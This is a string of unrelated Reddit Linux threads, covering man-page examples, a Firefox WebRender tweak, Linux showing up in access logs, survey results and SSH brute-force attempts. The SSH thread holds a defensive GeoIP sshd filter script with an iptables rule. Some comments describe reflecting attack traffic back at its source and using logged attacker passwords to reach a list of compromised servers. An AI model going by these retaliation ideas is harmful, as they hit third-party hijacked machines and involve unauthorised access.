rsautl, rsync, rsyncd, rtime, rtld-audit, rtmon, rtnetlink, rt_sigaction, rtstat, runlevel, run-mailcap, run-parts, s2p, sane-find-scanner, sane-matsushita, scandir, scanimage, scriptreplay, SDL::Event, sdptool, see, select, select_tut, semop, sem_overview, sem_post, semtimedop, sem_timedwait, sem_trywait, sem_wait, send, sendmsg, sendto, sepermit, setaliasent, setarch, setfacl, setkey, setkey_r, setpci, setutent, setutxent, sfdisk, shells, sigaction, sigaltstack, signalfd, signalfd4, skill, slxdecode, smbget, smime, snice, snmpd, snmpd, snprintf, sockatmark, socket, software-center, sort-dctrl, sources, speaker-test, spkac, splain, splice, sprintf, spu_create, spufs, spu_run, srand, ss, ssh-keyscan, started, starting, start-stop-daemon, startup, stat, stat64, stdarg, stdbuf, stopped, stopping, stpcpy, strfmon, strftime, strptime, strtod, strtof, strtok, strtok_r, strtol, strtold, strtoll, strtoq, strtoul, strtoull, strtouq, sudo, sudoedit, sudoers, svgalib, svnserve, swapcontext, synclient, syscall, sysctl, sysctl, sysctl, tar, tbl-dctrl, tc-drr, tcpd, tcpdmatch, tcpdump, tc-sfq, tc-tbf, tdelete, tdestroy, tee, tempfile, term, Term::Size, tfind, Tie::IxHash, time, time, timer_create, timerfd_create, timerfd_gettime, timerfd_settime, timer_getoverrun, timer_gettime, timer_settime, Tk::Adjuster, Tk::Balloon, Tk::callbacks, Tk::chooseColor, Tk::chooseDirectory, Tk::CmdLine, Tk::Compound, Tk::demos::widget_lib::slide, Tk::demos::widget_lib::trace2, Tk::Dialog, Tk::DItem, Tk::event, Tk::getOpenFile, Tk::HList, Tk::LabFrame, Tk::messageBox, Tk::Optionmenu, Tk::TList, Tk::Trace, tput, transport, tsearch, tty_ioctl, twalk, ucf, ucfr, ucs2any, ufw, ufw-framework, unix, unzip, unzipsfx, update-alternatives, update-binfmts, updatedb, update-inetd, update-initramfs, update-rc, urlgrabber, usb_printerid, uscan, utmpname, utmpxname, va_arg, va_copy, va_end, va_start, vcs, vcsa, verr, verrx, versionsort, vfprintf, vgchange, vgconvert, vgcreate, vgimportclone, vinagre, virt-clone, virt-convert, virt-image, virt-image, virt-install, virtual-filesystems, virt-viewer, vorbiscomment, vorbisgain, vpnc, vpnc-connect, vpnc-disconnect, vprintf, vsnprintf, vsprintf, vwarn, vwarnx, w3m, wait, waitid, waitpid, warn, warnx, watch, wcstok, whereis, wipe, withsctp, wmempcpy, wodim, wordexp, wordfree, word-list-compress, wpa_supplicant, wpa_supplicant, wrestool, writev, www-browser, WWW::RobotRules, X, x509, xargs, xauth, xdg-desktop-icon, xdg-desktop-menu, xdg-email, xdg-icon-resource, xdg-mime, xdg-open... and the authors of said sections deserve some recognition.
I've been working on compiling a list slowly over time, I was thinking of making a more n00b friendly version of man. I still like having man the way it is but I would like a noobman as well containing examples and simple explanations.
I wondered about mirroring all man pages in a wiki where people could make additions.  Something where the official man page could be seen with wiki'd additions in a separate text style.

I did find an existing man wiki but it seemed to be mostly dead. 
A lot of the time those of who write manpages are not all that good at writing documentation. The biggest obstacle, in my experience, is lack of understanding what someone else would need from a manpage (or other document). It's not often a question of being unable to express something, but not knowing what to express.

When you've spent a lot of time writing the code, many of the things that you care about most are entirely irrelevant to someone who'd just like to use the program. For example, if you've spent a lot of time implementing B-trees for you backup program, you'd be quite tempted to explain, at length, why they're such a nice thing, right at the top of your manpage. However, the reader almost certainly does not care.

That's why it helps to get feedback from other people. Even just a question like "I don't understand how to restore files, could you add an example to the manpage?" is helpful, since it guides the developer to add relevant stuff.

Even better is, of course, suggestions for specific changes to make, or an entire manpage from scratch.

You don't need to be an expert on the software to write documentation. It's an iterative process, and you have access to the software author, and you can ask questions. Speaking as a programmer, I'd value very highly someone who asked med questions in order to improve documentation.
I use the FreeBSD manpages because of the examples. Most of the time they work in Linux too.
We anxiously await your contribution. 
Dude, look at the bottom of the man page for the author and email the author an example. Quicker than submitting a patch, and normally quite well received.
Sidenote to Linux programmers and documenters: WRITE MANPAGES!
Seriously, common\simple examples should be at the very beginning of every man page.
Dear (Ubuntu) manpage writers, don't do this:


      DESCRIPTION
       mountall  reads  fstab(5)  and calls fsck(8), mount(8) and swapon(8) in
       the correct order to mount filesystems once the underlying devices have
       been created by udevd(8)

       This is a temporary tool until init(8) itself gains the necessary flex‐
       ibility to perform this processing; you should not rely on  its  behav‐
       iour.

from mountall(8). On a long term release. Bastards...
Funny this is the single most common complaint I hear from BSD enthusiasts.  That GNU or LInux man pages lack examples.  Thank you for voicing this, as it really is a valuable feature when presented.  
Working with the touch command, I once googled "man touch".

Thank goodness the first few links are actually for the manual page.
very witty comments and a lot of them very true!
forgot to mention:
cat /usr/share/doc/pkgname-ver/EXAMPLES 
Also, instead of somewhere at the end, the examples should be at the beginning somewhere after OPTIONS.
Documentation has always been a problem, not only, but especially with oss. You still get comments like: Read the source, what else do you need. Lulz. 

Documenting all the wonderful oss out there is a huge project in itself that is still poorly addressed, mainly because of the lack of volunteers. Here is hoping that with the spread and increasing popularity documentation will get better. 

I once tried to find documentation on how to spin down a spare disc in a Linux softraid 1 environment (three disks, two active, one hot spare that I wanted to spin down for less power usage and longer shelf live, because of less use of mechanical parts). All I found was a mailing list comment from the developers that spinning down wouldn't work with the old on disk softraid format. So I guessed it might work with the new one. But that was it. I didn't even find a way to see if the disk was spinning at all.

This is just one example, that I tried researching very hard in during the last year and that came up completely empty. There are tons of other examples, though.
WE FEAR CHANGE!!! - the linux community
How many examples have you published?

Here is a tip: Use "/" to begin a keyword search when looking at a man page.
I just made [/r/manpages](http://www.reddit.com/r/manpages/), because I know we've all seen this thread on every forum everywhere. Let's organize and write some good doc's for the future.
It's open source. You add examples.
Perl PODs usually have a section called [SYNOPSIS](http://search.cpan.org/dist/Moose/lib/Moose.pm#SYNOPSIS), which is basically the examples section, very near to the start of the "manual page".
This part is also some kind of usage example. (If clearly laid out)

    SYNOPSIS
           git checkout [-q] [-f] [--track | --no-track] [-b <new_branch> [-l]] [-m] [<branch>]
           git checkout [-f|--ours|--theirs|-m|--conflict=<style>] [<tree-ish>] [--] <paths>...

Don't just add examples, put the examples at the beginning. 
Manpage writers are examples of A.D.D. 
Have GOOD examples. I have read man pages that have examples, but when i try to run them they are crap. Google for better example, find and run. Waste of time, just think of the process the user is going to be running and actually put that in there!
I find the standard C library manpages to be the most confusing. I wish there's more coverage of functions and examples. Like handling all possible combinations of errors/conditions that can occur when doing file I/O.
I heartily agree with this. Upvote!!!
Also please have a manpage or at least a --help and a -h option

> -> % nm-applet --help
> Usage: nm-applet
>This program is a component of NetworkManager >(http://projects.gnome.org/NetworkManager).
>It is not intended for command-line interaction but instead runs in >the GNOME desktop environment.

I think this might be better then it did before, I don't remember for sure but I think --help use to be an invalid option, seems like -h is too. Why do I want to run nm-applet on the command line, maybe on kde or one of the minimal wm. Also the startup of nm-applet seems to pass --sm-disable and I have no idea what that is.
sudo upvote
Isn't this what "info" is for?

I just recently found out you can edit the man pages on your system yourself.  I never understood why anyone writing a man page would not add an actual example.
Yea, the best way I learn is with examples.
I agree wholeheartedly.  Manpages are great, but the information I'm looking for is always buried.
amen
I love the OpenBSD man pages, they're very well written compared to those in most Linux distributions, but of cause they only cover the base system. 
This also goes for library man pages too.  The getopts man page is an awesome example.
Dear infodoc writers,  die.
Yes, please.
Fuck yeah!
holy crap at over 1200 upvotes in /r/linux!! I don't think i've ever seen anything upvoted this much here.
100 % agree with you man ...
They should have at least 3 examples for basic, intermediate and advanced usage.
On the opposite side, I wish `$program -h` did not spit out more than one screen full of text. Just the facts, ma'am. 
Can't upvote this request enough

In many cases I want to see examples rather than read a reference, it's analogous to learning by example

Check this beautiful snippet from the tar manpage:

     Create archive.tar from files foo and bar.
           tar -cf archive.tar foo bar
     List all files in archive.tar verbosely.
           tar -tvf archive.tar
     Extract all files from archive.tar.
           tar -xf archive.tar
IT HAS BEEN SAID!
Just because of it, I spent an hour looking for how to use tar.
manpages are to me the least helpful thing when it come to getting info about a command I need to run.
A very handy program would be hints, working like the man pages or the -? or --help etc, but providing several example usages and a short text about them.

You could create a hints node with your history: eg hin<tab> hist<tab> -n for the nth previous command or n for the nth command.

This could be tied to a wiki for further community editing-- with the option to upload without publishing so you can edit there before publishing.

Passwords would be automatically redacted locally on your machine.

edit: Downvotes (serious question here)??
I always sort of felt like man pages were a rite of passage, but mehh.
Your post title is not a complete sentence. Also, I don't know what attention deficit disorder has to do with manpage writers.
Dear OP,  USE GOOGLE
Dear Ubuntu users: 

Learn to read.
Firefox was kind CPU heavy consuming .

About 50%-60% when watching a video on youtube/twitch .

Tried this : 

Open about:config  
 in a new tab (and okay any warnings)

1. Search for gfx.webrender.all
2. Set the value to True  
 to enable WebRender 

CPU dropped around 20%-30% when watching videos.
Have a look at https://wiki.archlinux.org/title/firefox#Hardware\_video\_acceleration you may find more improvements tweaking some other things
Fedora and Manjaro Gnome has default WebRender enabled in Firefox. Also you can enable hardware video decoding in Firefox and cpu usage drop enen more for youtube/twich etc. my CPU usage on youtube 10-15%.

https://wiki.archlinux.org/title/Firefox#Hardware_video_acceleration
Enabling webrender screws up having multiple Firefox windows on Wayland, which sucks. I seriously hope it gets fixed soon
You should add a note clarifying that this will only work for hardware and drivers which supports the VAAPI HW acceleration frameworks. For example, Nvidia users won't be affected by this change because Firefox doesn't support NVDECODE, or more accurately, NVIDIA doesn't support any of the FOSS HW accel frameworks.

Furthermore, on many systems this will cause artifacts and other weird behavior.
Oh God, thank you so much! That's what a was looking for years.

It works.

I used to watch twitch with the video player which had to have a resolution equal or lower than the one of the stream sent by twitch or else in full screen, otherwise, a higher resolution made everything jerky and slow with a 100% CPU consumption and the browser was almost not responsive anymore. I had already tried a lot of hardware and other acceleration combinations without success.

Now no interpolation slows down the browser.
Alternatively, you can just watch streams or YouTube videos directly in a media player like vlc or mpv. Personally I'm using mpv with yt-dlp and streamlink, it barely uses any CPU power and it's smooth as butter.
Only with intel cards
hmmm no noticable change on my system, using X with intel igpu. Confirmed in about:support that it's running. 

Any other advice?
I wouldn't advice this change on an CPU with integrated graphics.

On mine, it lead to a process called GPU that skyrocketed the resources usage and slowed down the computer (I am talking regular 100% CPU usage and also very high RAM then SWAP usage)

It bricked my laptop to the point it couldn't resume

Changing back the parameter you are taking about from True to False helped me to get my computer back to normal
I have this enabled already (X11). My problem is not the cpu usage, but ram usage. After a while days without restarting pc and Firefox (I put the pc to sleep mode), the ram usage can get to 9 GB!! And only with 2 tabs open. Restarting Firefox would reduce it to something like 2 GB in example. So there is a memory leak somewhere, that is the biggest problem to me.
20% is still high. 

&#x200B;

on my windows 11 machine I7 8865u IGPU only CPU usage is when streaming 4k video on youtube at 5% and gpu at 10-15. As soon as I move my mouse etc. it spikes up to 14% and goes down again.
Don't trust the advice of someone who confuses shutout with shoutout.
Use mpv+yt-dlp. You are welcome.
Is it just me, or is Firefox a complete and total train wreck lately under Linux? Every time they add some annoying or bizarre new behavior to it, I spend hours trying to fix it, and sometimes succeed, but then the annoying behavior returns and the fixes no longer work. It feels like a game of Whack-A-Mole...and I'm losing.
Ive done it on a Windows PC using Firefox too.

Cant have the hardware consuming differences right now but feels faster.
Thanks. But if it is so much universally better, why is it not default?
That messes up Firefox big time for me. It causes it glitch every single time I open it. It would open half cut off with the content of the page crammed to the bottom left of the screen and the window controls to the top right of the screen. The area between the content and the control buttons is just transparent where I can see the desktop. I'd have to unmaximize and maximize it again to make it look normal. It's so weird. Lol
Why does it always have to be complicated by default?
Try the h264ify extension
Another tweak that made my firefox more snappy: https://wiki.archlinux.org/title/Firefox/Profile_on_RAM
I am watching youtube with a twitch stream on mute and 30 open tabs and my CPU is barely up from idle.

I use fedora btw
or...

open terminal, 

`firejail firefox <enter>`

&#x200B;

and watch it behave.
Do not forget to enable hardware video acceleration on Firefox because AFAIK it comes disabled by default. That’s why YouTube uses a lot of CPU.
I enable hardware acceleration written in arch wifi firefox on Manjaro KDE. Now my firefox startup time is 3 sec too slow. And I am on SSD
[deleted]
I can't see video feeds on Google meet when I do that
Please dont shut me out
at this point im just switching to chrome
firefox is dead to me
Casual reminder to stop supporting mozilla.
Nice trick!
Using newest firefox on a ThinkPad running Fedora core 34.  I kept getting a lot of flickering that sometimes crashed the browser.  The fix was to turn off hardware acceleration and "smooth scrolling" feature in the settings.
What cpu are you using?
RemindMe! in 48 hours if this doesnt work, change it back.
I actually think I might have this problem too, I'll try this, thanks!
u/remindmebot 1hr
I've had this problem on a Windows system (particularly on Twitch) and **gfx.webrender.all** is _not_ enabled on it either. Should it be enabled, and may it reduce CPU usage issues? I guess I'll find out for myself.

I will say that something else may have changed since I had problems though (maybe new video card? Maybe website software being more optimized? or maybe something else?) because I haven't noticed actual freezing, skipping, or slowdowns recently.

edit: although in `about:support` It seemingly says that I am using it (`Compositing:	WebRender`), so IDK what the deal is. Also just noticed that I didn't update Firefox in a while, and it didn't have version 92, and version 92 seems to be WebRender's full/big roll out.
I paid for the whole cpu and I'm gonna use whole cpu! :) But seriously, I need to test this setting on my unit.
oh shit i'll definitely try this out
https://linuxreviews.org/Firefox\_Is\_Making\_WebRender\_The\_Default\_Rendering\_Engine\_On\_Linux\_This\_Month\_And\_There\_Is\_A\_Facelift\_Coming\_In\_May
A client of mine just got worried thinking they were attacked because "Linux" showed up in their access logs.

The logs showed successful attempts of logins and access to sensitive data.

Fact:

They didn't know I switched to Linux in the meantime, and was the one who just did my job.

And now, I feel like the nice monster everybody is afraid of just because of a monsters general bad reputation 👻
Have fun being called Hackerman until retirement or you leave!
Having someone actively checking access logs, noticing a change, and raising flags about it are all good things. They were wrong this time, but they were right to be worried.
Fun story - I was working the front desk at the recovery clinic I work for, and the IT guy walked past my desk and saw my Kubuntu Thinkpad, which was running some very basic stuff. (htop, a CLI calendar, and I was updating at some point in terminal) 

Fast forward a half hour, and my bosses boss and the IT guy pull me into an empty conference room, start asking me about my 'network scanner,' start telling me about how I'll be fired if I ever bring that computer back to work again, ect ect

I bring the computer to the room, show them what I'm doing and logs and such - everyone dials it down, has a few laughs, totally not fired but now they just call me "hackerman" and make jokes about the FBI coming for me.
Way back when I was in college, I was taking a trip to see some family, but had a school project to work on, so I brought my laptop with me and was working on it in the airport. I'm an IT major and had a terminal up on my screen while working on whatever it was. A janitor saw me and called security. Fortunately, the security guard wasn't a colossal idiot and was like, "Okay, it's a computer. Am I supposed to care?"
Just imagine their reaction if they saw "Temple". I would have a similar reaction, because as of right now, TempleOS doesn't have a networking stack.
Switch to some BSD to scare them even more
Unusual access patterns, like evidence of account being accessed from a different platform, should raise flags; someone in IT security is doing their job.

People in security have to make noise about things like this to prove that they are doing something of value during those periods in between security incidents.

If security people are invisible between incidents, they may get blamed for having been doing nothing, leaving the organization unprepared.
"Is this successful login attempt you?"
"Yup."
"Ok, just making sure."

Freakout avoided.
I got booted off the library computers for using Visual Basic 6 when I was a kid, the librarian said “no hacking!”.

I had to get the IT teacher to step in, but the librarian still side eyed me for the rest of the year
Years ago I was hired as a Linux sysadmin and given a company laptop with XP on it. I quickly (with supervisor permission) wiped it and put Linux on. Months down the road Adobe random property management guy from another office fusses at me for it saying I was dumb because I would no longer be able to help from the company help desk. The irony of the statement was lost on him
Should have run 

    cmatrix

just to mess with them.
Well, if they were of the belief that only non linux clients would legitimately connect, then suddenly a linux one appears, obviously they are going to get worried. Same thing would happen if they expected linux clients and saw windows. Sounds like they freaked out over unusual access, not linux.
Reminds me of the [2001 parody "Is Your Son a Computer Hacker?"](https://wh0rd.ca/humor/text/Adequacy_org%20%20Is%20Your%20Son%20a%20Computer%20Hacker.htm)
Oh my gawd, you've got a client that actually looks at logs!  Lucky you!
This happens in my home all the time.

Even my wife, when she sees me using my Linux, she automatically assumes I am hacking lol
Amazing how well Microsoft's FUD campaign is still working after all these years
I had an employer limit my access once because I was basically doing my job and configured an antispam server on the premises to get rid of both spam and malicious attachments that were definitely being delivered to the owner of the business and others. I also configured a software based VPN on their server to connect it directly to an offsite location they owned. I am not sure if the routers at that business was even capable of VPNs on either side - regardless I was well versed on how to do it in software & knew that I could set that up within minutes so that is what I did.

Also installed Google Desktop, but modified on another system to help users find work related files as they needed them because people were simply duplicating work & files, sometimes by accident even. I had to even install an app on some users computers to prevent them from accidentally dragging & dropping files and relocating them. Only did that after the 3rd or 4th time someone coming to me all upset because "their file" disappeared AGAIN.

I just wanted to scream and be like "No one is touching your files, you keep moving them." after setting up an app that would prompt them to confirm any time a file was being relocated that finally shut them up.

I also regained access to the server I was supposed to be managing. Only reason I ever lost access was because of an inexperienced IT contractor that spewed BS about me based on the software I had installed. Looking back though I probably should have only done the software VPN as a temporary solution, particularly btwn Windows & macOS. Had it been dedicated linux VMs that'd been fine, although VMs were a fairly new concept then. Would have been best to setup dedicated routers.
[this is in real time...](https://www.youtube.com/watch?v=hkDD03yeLnU)
Dangerous open source software. Bad! Better use <insert big company name> instead
Lol! You gonna hide the secret from them to see how far the panic goes? xD
Haha somebody needs education
if you run a webserver and look at the log, you will see bots trying to poke for vulnerabilities all the time.
A list of Linux and Unix devices they likely use daily:

* Cell Phone, smart watch, tablet mobile devices.
* Smart TV, or Roku, ChromeCast, etc
* Router
* Any IoC devices, like home security
* Most web sites
* Car, if it's modern
OP Concern, were they aware of the change to Linux, if not why?
First time I saw the word linux I thought it was a character from a kid's book.

Very scary.
Tell him that's the safe American Linux, he should watch out for the Chinese Rinux.
“Bad reputation”?!

Maybe 25 years ago.
As a non computer person I feel like I walked into the wrong room in a building. I don't even know what Linux is, I use mobile. Maybe il just stick around and randomly comment about things beyond my understanding
be happy they didn't pannick to hard, during colelge the network administrator likely had watched to many of those fictional police investigation shows targeted at people who might not even know how to turn on a computer. since that person panicked and set up a filter on the network to autoban all devices running Linux from the network(note this was some years back, before general people started to use it and figured out that almost all devices actually run Linux with some VM for the UI they think is a os).
Society nowadays, they can be fooled by anything.
Hackerman gets around
Had a PM show me a basic JSON format and argued that this is all I need to finish a complex Data Engineering Pipeline
I thought Logs show MAC address of devices too
Did you guys ever look at stop logging sensitive data?
This year's StackOverflow survey paints a very positive picture of Linux adoption among devs.

&#x200B;

It is used as the primary operating system of  \~25% of developers, equaling MacOS.

&#x200B;

[https://insights.stackoverflow.com/survey/2019?utm\_content=launch-post&utm\_source=twitter&utm\_medium=social&utm\_campaign=dev-survey-2019#technology-\_-developers-primary-operating-systems](https://insights.stackoverflow.com/survey/2019?utm_content=launch-post&utm_source=twitter&utm_medium=social&utm_campaign=dev-survey-2019#technology-_-developers-primary-operating-systems)

&#x200B;

Linux is the most loved platform, so this share will probably grow further:

&#x200B;

[https://insights.stackoverflow.com/survey/2019?utm\_content=launch-post&utm\_source=twitter&utm\_medium=social&utm\_campaign=dev-survey-2019#technology-\_-most-loved-dreaded-and-wanted-platforms](https://insights.stackoverflow.com/survey/2019?utm_content=launch-post&utm_source=twitter&utm_medium=social&utm_campaign=dev-survey-2019#technology-_-most-loved-dreaded-and-wanted-platforms)

&#x200B;

Year of the Linux (Developer) desktop ?
How does this compare to last year's?
Yeah, 50% are developing for Linux yet on 25% have a Linux workstation. Corporations not supplying the right tools for the job.
Seems weird when all I see at conferences are MacBooks... Maybe Mac people go to conferences more?
Linux is a dream for development. When you're a developer, in fact, one of the only good criticisms in the past about Linux becomes its strongest quality: the reliance on the terminal! Unlike windows which makes you lose several seconds by clicking on and opening a gui for everything (trust me, it adds up), with linux you have direct access to everything you need right from the terminal. 

This makes a developers workflow much, much faster. SSH'ing into a server to replace an executable and coming right back takes a couple seconds, limited by your typing speed. Opening remote connect, clicking on all the settings you need, clicking ok, then clicking on this and that to copy it over, rdpclip.exe freezing and needing to be restarted which is more clicks, it definitely adds up.
I've been using Linux for years and the only reason I miss using Windows is for WebEx and other conference services that I have to use Windows for. Other then that I wouldn't use any other OS else.
I've been writing my application since last July.  Every few weeks I fire up Windows and MinGW and make sure it will run.  I admit I hate doing it.   I am  wondering if it is worth all the hassle to potentially  reach a larger market.
I will not work where I cannot run Linux full time...
I made the switch.  Had been using a Mac for almost a decade for development and did replace with a Pixel Book that comes with GNU/Linux and what I now use for development.

Been really happy with the move so far.   I also get Android which was not the reason for doing the switch but it actually comes in handy more often than I thought it would.

Really like how Google has done the GNU/Linux support on the Pixel Books with Crostini.     How they did it you get Wayland and XWindows support.

I have move to using Flutter for iOS development and the only thing that still sucks is needing to turn on my MBP to sign apps for the Apple app store.  The last thing I need is a cloud based service that I can use to sign Apple apps.

BTW, the keyboard broke on the MBP a second time and what was the catalyst.    Apple support was excellent.  I could not ask for more.  But it is still a huge hassle to go to the Apple store and be without the machine.

The keyboard issue on the MBP is not getting as much press as it should.   It is an actual issue.  Not a bunch of reddiots bitching.
It is remarkable that OSX is still held in such high regard. In terms of developer friendlyness they have been getting increasingly worse for a couple of years now, while Windows is getting slightly better through WSL.
With Linux (or Ubuntu, a distro that I am using), I can download any programming language I want through Terminal without having to do tedious setup. That's why I enjoy using Linux more than any OS out there.
Love is a strong word.

Its not Windoze, and that's enough.
I genuinely don't understand how so many devs are satisfied working on MacOS. The lack of a native package manager is a complete non-starter for me. Does Homebrew really work that well? I've used it a bit and it seems to break more often than not, and God forbid you upgrade MacOS. Maybe it's gotten better?
Most loved platforms are mixed by OSes and hardware, "Raspberry Pi" is in the fourth place, but aren't most RPI users (if not all) using Linux?
Keep in mind that this was also the year that Microsoft released the Ubuntu terminal and other tools specifically designed to retain developers who are used to Linux... and they’re still losing users.
I don't see how it's the most loved if half the people are using windows.
When you dev but you also have to easily open fully-featured psd or xls files.
As someone who switched to Windows this week, after about 6 years of having Linux as my primary OS, I must say that this is oddly comforting. I always believe that the vast majority of developers owned Macs or something UNIX-like and that that programming in Windows was so trash that it would rank well below MacOS especially. Programming in Windows isn't nearly as hard as some people made it out to be (including myself) if 47% of developers surveyed said they used it. With WSL the transition has been mostly painless but it has been less than a week so I'm not sure how long things will go this smoothly but programming in Windows is doable, at the very least.
Now if only Linux had better apps
Does this mean desktop environment or just deploy environment?

I work just well with server running Linux (I mean what other option?), but Linux for personal usage is still suck for me. I don't know why but the UX is just off.

Also for this vote, I will of course vote both MacOS and Linux. Multiple choice could be misleading sometimes.
75% are frauds

jk, my company doesn't allow linux. have to use an overpriced macbook pro.
[deleted]
Linux is not a "platform" and things should stop acting like it is.

There is no real feasible way for software to "target Linux" and no "GNU/Linux" is not a plarform either.

Most of these distributions are their own platform and software often needs significant patching to run  on another and that's fine; these different operating systems have no obligation to be like one another but things should stop acting like it's any other way as well.

I would go so far as to say that for a lot of use cases  "Ubuntu GNOME" and "Ubuntu KDE" already become different platforms because some stuff stops working properly. Steam in particular says "We only support Ubuntu Xorg KDE/GNOME/Unity" and other than that you're on your own."; one some platforms that are similar enough you can get it to work with hacks but good luck ever running it on Alpine Xorg KDE or Ubuntu Wayland Sway.

Linux just isn't a "platform" in the same way that Windows is where all this is centrally controlled and for a lot of applications whether you use Wayland or Xorg will have a bigger impact than kernels like say Wine which runs fine on any Unixlike kernel but the developers have announced they have no intention of as much as attempting a Wayland port since it doesn't offer a lot of things they need and it's far harder to map Windows to it because it functions completely differently from Windows.
You mean GNU/Linux. Linux is simply the Kernel. Let's give the GNU guys some credit, which they surely deserve :)
The one thing I ask is awesome touch gestures like Macos...then we'll have everything.
Jebus H. Christ in a chicken basket, look at the development environments... I feel the need to hork.  


Visual Studio / Android Studio takes the top spots.  <shudder/>.  


At least I can sleep well knowing those vile yet criminally fraudulent Emacs users aren't holding sway with their idolatrous nincompoopery.
1. Holy shit VS Code really took off.
2. Where would WSL fall. I would not put down Windows if I had taken the poll
How the fuck do people actually PREFER windows? I thought it'd be like 0.01%
How could people do their jobs with so buggy Linux desktops?
So I have somebody in china trying to brute force ssh into my server. Out of boredom I set iptables to redirect all of the ssh attempts back to the original server (ssh appears to be enabled)... they are now effectively hacking themselves. I sure hope they break in and start deleting stuff

Just thought I'd share 
Now your isp is going to notify you that hacking attempts are originating from your box.  Lol
SSH brute force attempts have been a fact of life for over a decade.  I've moved ssh to a different <1024 port to keep my logs from getting bloated from worms and other automated attempts.
Well...? Show us the iptables rule...
Honest question, I am just a Linux user, not a sysadmin: How do you "notice" somebody in China trying to brute force ssh?  Are you constantly monitoring logs? Do you use a tool for this?  Are there tools for normal users that can help us notice these kinds of attacks happening.

I'm asking because when I ssh into my Ubuntu laptop from another computer to transfer a file, there certainly is nothing that appears on my screen to indicate it.  I'm sure something is recorded in a log file, but I never check them.
Amusing but it's not an actual 'hacker' just a ssh worm. They are fairly frequent.

In the past I rigged my SSH server to log the passwords out of curiosity. Then I googled the password and actually found a publically accessible webserver server containing a log of compromised systems. Most of them where down but a few worked.
A more elaborate version of 
http://www.userfriendly.org/cartoons/archives/01may/uf003073.gif
"Wow that's my password too!"
FWIW: If you can't lock down SSH by only allowing access from trusted IP addresses or IP address ranges, then look into locking it down with Geo-IP. Which is kinda trivial on Linux:

Add this to /etc/hosts.deny:

    sshd: ALL

Add this to /etc/hosts.allow:

    sshd: ALL: spawn /usr/local/bin/sshfilter.sh %a

And here the actual /usr/local/bin/sshfilter.sh:

    #!/bin/bash
    # UPPERCASE space-separated country codes to ACCEPT
    ALLOW_COUNTRIES="US CA"
    if [ $# -ne 1 ]; then
      echo "Usage:  `basename $0` <ip>" 1>&2
      exit 0 # return true in case of config issue
    fi
    IP=`echo $1|sed -e 's|::ffff:||g'`
    COUNTRY=`/usr/bin/geoiplookup $IP | awk -F ": " '{ print $2 }' | awk -F "," '{ print $1 }'|head -1`
    [[ $COUNTRY = "IP Address not found" || $ALLOW_COUNTRIES =~ $COUNTRY ]] && RESPONSE="ALLOW" || RESPONSE="DENY"
    if [ $RESPONSE = "ALLOW" ]
    then
      logger "$RESPONSE sshd connection from $IP ($COUNTRY)"
      exit 0
    else
      logger "$RESPONSE sshd connection from $IP ($COUNTRY)"
      /sbin/iptables -A INPUT -s $IP/32 -p tcp --destination-port 22 -j DROP
      exit 1
    fi

Of course the script needs to be made executable and as a pre-requisite you need GeoIP installed. The above script will then only allow SSH access to port 22 from US and Canadian IP's. 
You have "someone".  I get hundreds....thousands.  This sounds like a good idea on paper but they are probably using other hacked systems as a proxy.  So this will only cause problems for you since it will be your IP that is reported.  
Realistically, you're just redirecting malicious traffic back at another victim. These type of worms propagate themselves, so it's significantly more likely you're just hitting some other poor sap's broken computer.

If you ever really want to help when something like this happens, if the IP address is from a 1st world ISP, lookup the whois information and email abuse@ the owner of the IP block with proof of SSH brute force.

Also, if you want to prevent yourself from being the victim of this, setup something like fail2ban or denyhosts to automatically IP ban people who try to brute force your authentication.
Direct them to the cyber police!!1
LPT: If you have sshd up and running, use key-based authentication and 2FA! If it's good enough for WoW, it should be good enough for your server!
they don't care, botnet stuff
20 bugs fixed and 60 bugs introduced
It will be amusing when the guy in China sees what looks like your attempts to hack his ssh, and responds by redirecting the connections back to you.
It's just China's government hacking classes.
Or just install fail2ban
I'm using keys for my servers exactly because of this. But heck, they may really end up deleting all their own files.

weeks ago i got many ssh brute force attemps, i did some ip scan with nmap and i noticed that most ip are routers with remote administration activated.

routers had the acces credentials to their default factory. LOL
[deleted]
Lots of snarky prats in this thread.
Lmao neat, what a neat way to show what iptables is capable of doing. Any other hints you might tell us how you figured out they were trying to brute force SSH? I never see anything...oh wait I forgot my port for SSH isn't open to outside, makes sense now lol.
Btw, mind the original meaning of the words 'computer hacker'.
I once used twisted to send a choice message to attackers hitting port 22... It was a choice line from "Seventh Son" (the book by J.C. Hutchings).  The bot keep hitting my system continuously for about a week and then a real user started attempting login. How could I know they were real? The random longer periods between attempts and usernames were much more human. Once he saw the message in his bot's logs from twisted, I suppose he thought he could get in, but gave up after about 30 attempts. 


I find the best way to deal with machines that have internet-facing SSH ports, is to disable password auth and set up key auth. 

I'm sure it's possible that someone could still get in there somehow, but I don't own any servers with internet-facing SSH that allow password auth, they all require a passphrased key for access. 
you just basically proxied that.. now get ready for a letter, phone call or even a visit..  
/r/pettyrevenge
How did you do that to set that iptables ?
Best thing to do to an attacker, reflect!
I hope the hacker doesn't get angry and dos you. Your post reminded me to check my auth.log. I'm installing fail2ban right now.
Won't they notice they aren't connecting to the same server, since the fingerprint won't match? I like the idea of self-hacking though ;)
Did something like that at work once.  Security launched a Scan against our Linux Servers, from within the internal network.  Internal networks were allowed though the firewalls.   They knocked a bunch of production servers offline.

So IP Table magic.  Next scan we redirected it back to the source.  Latter we just blocked all traffic from  networks outside our vlans.  

We became very secure very fast.
So what did you do? Forwards incoming port 22 to outgoing port 22 at his IP?
Amazing. Your using the exact same password as I do... what are the odds. :)
Now write a script to do this automatically after a few failed logins from an IP.
[deleted]
Love this
What tools do you use to monitor your network?
You could also redirect it to a .mil IP.
Im gonna hack this IP of 127.0.0.1
Haha fuck you made my day.
[Wow, sounds like a great hack!](http://www.reactiongifs.com/wp-content/uploads/2013/06/I-dont-believe-you.gif)
Nice dude! I just added a auto-ban on too many tries, never had my machine comprised by noobs so far. :)
Haha. good one. 
Hah! Serves them right.
This comment has been overwritten by an open source script to protect this user&apos;s privacy.  It was created to help protect users from doxing, stalking, and harassment. 

   If you would also like to protect yourself, add the Chrome extension [TamperMonkey](https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo), or the Firefox extension [GreaseMonkey](https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/) and add [this open source script](https://greasyfork.org/en/scripts/10380-reddit-overwrite).   

 Then simply click on your username on Reddit, go to the comments tab, scroll down as far as possibe (hint:use [RES](http://www.redditenhancementsuite.com/)), and hit the new OVERWRITE button at the top.   

  Also, please consider using [Voat.co](https://voat.co) as an alternative to Reddit as Voat does not censor political content.
[deleted]
